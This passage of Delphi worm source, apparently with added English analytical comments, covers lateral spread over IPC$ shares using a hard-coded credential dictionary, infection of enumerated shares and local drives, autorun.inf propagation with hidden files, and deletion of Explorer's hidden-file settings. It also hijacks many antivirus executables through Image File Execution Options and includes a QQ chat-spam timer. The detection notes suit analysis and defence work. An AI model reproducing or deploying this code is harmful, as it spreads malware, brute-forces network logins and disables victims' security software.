BRes: Boolean;
begin
Ver.dwOSVersionInfoSize := SizeOf(TOSVersionInfo);
BRes := GetVersionEx(Ver);
if not BRes then
begin
Result := False;
Exit;
end else
Result := True;
case Ver.dwPlatformId of
VER_PLATFORM_WIN32_NT : Value := True;
VER_PLATFORM_WIN32_WINDOWS : Value := False;
VER_PLATFORM_WIN32s : Result := False;
end;
end;
//根据计算机名获取对方IP地址函数
function GetIP(Name:string) : string;
// Resolves a host name to its first IPv4 address as dotted text.
//   Name: host name handed to GetHostByName.
// Returns the first entry of h_addr_list, formatted by inet_ntoa.
// Winsock is started and torn down on every call (WSAStartup/WSACleanup),
// so the library reference count is balanced per call; the WSAStartup
// return value is not checked.
// The hostent pointer is not checked for nil: when the lookup fails, the
// dereference of Phe^ below raises an access violation rather than returning ''.
// The '' stored in Result first is overwritten unconditionally.
type
TaPInAddr = array [0..10] of PInAddr;
PaPInAddr = ^TaPInAddr;
var
phe :PHostEnt;
pptr : PaPInAddr;
I : Integer; // unused
GInitData : TWSADATA;
begin
WSAStartup($101, GInitData); // requests Winsock 1.1
Result := '';
phe :=GetHostByName(pchar(Name));
pptr := PaPInAddr(Phe^.h_addr_list);
result:=StrPas(inet_ntoa(pptr^[0]^)); // first address only
WSACleanup;
end;
//返回IP段前3节
function Extractip(ips: string): string;
// Returns the leading part of ips up to and including its last '.', so a
// dotted address such as '192.168.1.100' yields '192.168.1.' and a string
// without any '.' yields ''.
//   ips: the text to take the prefix from (a by-value copy, consumed here).
var
  prefix: string;
begin
  prefix := '';
  // Move characters from the head of ips to prefix one at a time, stopping
  // as soon as no '.' remains; the last character moved is the final '.'.
  while Pos('.', ips) > 0 do
  begin
    prefix := prefix + ips[1];
    Delete(ips, 1, 1);
  end;
  Result := prefix;
end;
//枚举共享
procedure netshare;
// Lateral-movement routine: walks 192.168.1.2-254, tries each hard-coded
// credential pair against host\ipc$, and on the first success enumerates
// shares and hands each one to kfile (the author's own comment below calls
// kfile the directory-infection routine).
// kfile, fff2, getcname, IsNT and the NetShareEnum/NetShareEnumNT procedure
// variables are declared outside this view.
// Detection notes, from the visible calls only: a burst of IPC$ session
// attempts across a /24 from a single host; NetShareEnum issued over a
// freshly opened session; and a remembered network connection left behind,
// since CONNECT_UPDATE_PROFILE records the mapping in the user profile and
// nothing here cancels it after success.
// Author's note: credential dictionary; some entries were removed.
const
suse_pass:array[1..4, 1..2] of string = (('administrator',''),('new',''),('admistrator','123456'),('',''));
var
i,j,q:Integer;
FLibHandle : THandle;
ShareNT : PShareInfo2Array;
entriesread,totalentries:DWORD;
Share : array [0..512] of TShareInfo50; // stack buffer for the Win9x level-50 enumeration
pcEntriesRead,pcTotalAvail:Word;
OS: Boolean;
NR: tNETRESOURCE;
Ret: DWORD;
cip:string;
begin
// Author's note: computes the local IP prefix so the scan below could use it
// instead of the literal network ("since you are learning, the method below
// is a demonstration"). As written, cip is assigned here and never read.
cip:=extractip(getip(getcname));
// IsNT is defined above (its start lies outside this view); from its visible
// tail it returns False when GetVersionEx fails and sets OS to True only on
// the NT platform, so the 9x branch below is reached for VER_PLATFORM_WIN32_WINDOWS.
if not IsNT(OS) then exit;
for j:=2 to 254 do //scan the /24 for hosts that accept an IPC$ session
begin
// Drop any existing connection to this host before retrying with the dictionary.
WNetCancelConnection2(pchar('192.168.1.'+inttostr(j)+'\ipc$'), 0, TRUE);
NR.dwType := RESOURCETYPE_ANY;
nr.dwDisplayType := RESOURCEDISPLAYTYPE_SERVER;
nr.dwScope := RESOURCE_CONNECTED;
NR.lpLocalName := nil;
// NOTE(review): the remote name carries no leading '\\' as a UNC path
// normally does; whether WNetAddConnection2 accepts this form cannot be
// verified from here.
NR.lpRemoteName := PChar('192.168.1.'+inttostr(j)+'\ipc$');
NR.lpProvider := nil;
for q:=1 to 4 do //try each credential pair (user = [q][1], password = [q][2])
begin
Ret := WNetAddConnection2(NR,pchar(suse_pass[q][1]),pchar(suse_pass[q][2]),CONNECT_UPDATE_PROFILE);
if Ret = NO_ERROR then //session established: enumerate shares
begin
if OS then begin
// NT path: NetShareEnum is resolved from NETAPI32 at run time, so it does
// not appear in the import table.
FLibHandle := LoadLibrary('NETAPI32.DLL');
if FLibHandle = 0 then Exit;
@NetShareEnumNT := GetProcAddress(FLibHandle,'NetShareEnum');
if not Assigned(NetShareEnumNT) then
begin
FreeLibrary(FLibHandle);
Exit;
end;
ShareNT := nil;
// Author's note: enumerate over the IPC$ session just established; the
// address is hard-coded rather than taken from the scanned host because the
// author "feared it would spread too much". The enumeration therefore always
// targets 192.168.1.100, whichever host j the session was opened to.
// The buffer NETAPI32 returns in ShareNT is never released here.
if NetShareEnumNT('192.168.1.100',2,@ShareNT,DWORD(-1),
@entriesread,@totalentries,nil) <> 0 then
begin
FreeLibrary(FLibHandle);
Exit;
end;
if entriesread > 0 then
for i:= 0 to entriesread - 1 do //each share is passed to the directory-infection routine kfile
kfile('\\192.168.1.100\'+String(ShareNT^[i].shi2_netname),fff2);
end else begin
// Win9x path: SVRAPI.DLL level-50 enumeration of the local machine (nil
// server). The per-share action is commented out, so this branch only
// enumerates and the loop body is empty.
FLibHandle := LoadLibrary('SVRAPI.DLL');
if FLibHandle = 0 then Exit;
@NetShareEnum := GetProcAddress(FLibHandle,'NetShareEnum');
if not Assigned(NetShareEnum) then
begin
FreeLibrary(FLibHandle);
Exit;
end;
if NetShareEnum(nil,50,@Share,SizeOf(Share),
@pcEntriesRead,@pcTotalAvail) <> 0 then
begin
FreeLibrary(FLibHandle);
Exit;
end;
if pcEntriesRead > 0 then
for i:= 0 to pcEntriesRead - 1 do
// lbxShares.Items.Add(String(Share[i].shi50_netname));
end;
FreeLibrary(FLibHandle);
break; // stop trying passwords for this host after the first success
end;
end;
end;
end;
//新线程过程
procedure killwebPro(); stdcall;
// Thread entry point (stdcall, the convention a CreateThread start routine
// uses): runs the local pass over the C:, D: and E: roots, then the network
// pass in netshare, and finally unloads the hosting module and ends the thread.
// kfile, fff2 and subid are declared outside this view; the author's comment
// in netshare calls kfile the directory-infection routine, and subid is
// presumably the handle of the module to unload — TODO confirm.
begin
kfile('c:\',fff2);
kfile('d:\',fff2);
kfile('e:\',fff2);
netshare;
// Unloads the module identified by subid and exits this thread, so the
// hosting module is no longer mapped once the work is done.
FreeLibraryAndExitThread(subid, 0);
end;
//QQ尾巴过程
procedure qqProc(Wnd:HWnd;Msg,TimerID,dwTime:DWORD);stdcall;
// Timer callback (the parameter list matches the Win32 TIMERPROC shape used
// with SetTimer); on every tick it calls qqtext with the global qqms.
// qqtext and qqms are declared outside this view; the heading above ("QQ
// tail") suggests qqms is text injected into QQ chat, but that is not
// verifiable here. Wnd, Msg, TimerID and dwTime are ignored.
begin
qqtext(qqms);
end;
//写INF文件
procedure writeini(fpath:string);
// Writes a four-line autorun.inf at fpath pointing every autorun hook
// (open, shell\Auto\command, shellexecute) at gbk.com, the copy that chtrun
// places on the same drive.
//   fpath: full path of the file to write; rewrite truncates an existing file.
// Any I/O error (write-protected medium, missing drive) is swallowed by the
// empty except block, so callers cannot tell whether the file was written;
// if writeln raises, closefile is skipped and the file handle stays open.
// Detection: an autorun.inf whose three entries all name the same .com file
// on a secondary or removable drive is the artifact this leaves behind.
var
mm:textfile;
begin
try
assignfile(mm,fPath);
rewrite(mm);
writeln(mm,'[AutoRun]');
writeln(mm,'open=gbk.com');
writeln(mm,'shell\Auto\command=gbk.com');
writeln(mm,'shellexecute=gbk.com');
closefile(mm);
except
end;
end;
//写启动过程
Procedure chtrun;
// Persistence and drive-spreading setup. getwinsys(1) is declared outside
// this view; from the 'Temp\' and 'debug\' suffixes it presumably returns
// the Windows directory with a trailing backslash — TODO confirm.
// Steps, in order:
//   1. The two CopyFile calls with failIfExists=True copy Temp\~tmp83.tmp and
//      debug\debug.exe onto each other, so both exist if either does,
//      without overwriting.
//   2. Copies the same file to c:\MSDOS.log (overwrite allowed).
//   3. If it can be copied to d:\gbk.com, writes d:\autorun.inf and marks
//      both files with attribute 6 (faHidden + faSystem).
//   4. For e: the source is ParamStr(0), the running executable, rather than
//      SysPath; and the second filesetattr names e:\Autorun.com, which nothing
//      here creates, so e:\gbk.com is left with normal attributes.
//   5. Deletes CheckedValue and DefaultValue under Folder\Hidden\NOHIDDEN and
//      \SHOWALL, the values behind Explorer's "show hidden files" option.
//      This needs write access to HKLM; when RegOpenKeyEx fails it silently
//      does nothing. Return values of CopyFile in steps 1-2 are ignored.
// Detection: the file names above and the missing CheckedValue/DefaultValue
// entries under those two keys are the artifacts.
var
SysPath:String;
hTemp: HKEY;
begin
SysPath:=getwinsys(1) + 'Temp\~tmp83.tmp';
CopyFile(pchar(SysPath),Pchar(getwinsys(1) +'debug\debug.exe'),true);
CopyFile(Pchar(getwinsys(1) +'debug\debug.exe'),pchar(SysPath),true);
CopyFile(pchar(SysPath),Pchar('c:\MSDOS.log'),False);
if CopyFile(pchar(SysPath),Pchar('d:\gbk.com'),False) then
begin
writeini('d:\autorun.inf');
filesetattr('d:\Autorun.inf',6);
filesetattr('d:\gbk.com',6);
end;
if CopyFile(pchar(ParamStr(0)),Pchar('e:\gbk.com'),False) then
begin
writeini('e:\autorun.inf');
filesetattr('e:\Autorun.inf',6);
filesetattr('e:\Autorun.com',6); // does not match the e:\gbk.com written above
end;
// Remove the registry values behind Explorer's "show hidden files" option so
// the hidden copies stay hidden.
if RegOpenKeyEx(HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN', 0, KEY_READ or KEY_WRITE, hTemp) = ERROR_SUCCESS then
begin
regdeletevalue(hTemp,'CheckedValue');
regdeletevalue(hTemp,'DefaultValue');
RegCloseKey(hTemp);
end;
if RegOpenKeyEx(HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL', 0, KEY_READ or KEY_WRITE, hTemp) = ERROR_SUCCESS then
begin
regdeletevalue(hTemp,'CheckedValue');
regdeletevalue(hTemp,'DefaultValue');
RegCloseKey(hTemp);
end;
end;
//AV终结者的 文件映像劫持 过程
procedure ifso;
var
SysPath:String;
begin
SysPath:=getwinsys(1)+'debug\debug.exe';
RegSetString(HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\conime.exe\Debugger',SysPath);
RegSetString(HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360rpt.exe\Debugger',SysPath);
RegSetString(HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360Safe.exe\Debugger',SysPath);
RegSetString(HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.exe\Debugger',SysPath);
RegSetString(HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\adam.exe\Debugger',SysPath);
RegSetString(HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AgentSvr.exe\Debugger',SysPath);
RegSetString(HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AppSvc32.exe\Debugger',SysPath);
RegSetString(HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autoruns.exe\Debugger',SysPath);
RegSetString(HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgrssvc.exe\Debugger',SysPath);
RegSetString(HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AvMonitor.exe\Debugger',SysPath);
RegSetString(HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.com\Debugger',SysPath);
RegSetString(HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.exe\Debugger',SysPath);
RegSetString(HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCenter.exe\Debugger',SysPath);
RegSetString(HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ccSvcHst.exe\Debugger',SysPath);
RegSetString(HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FileDsty.exe\Debugger',SysPath);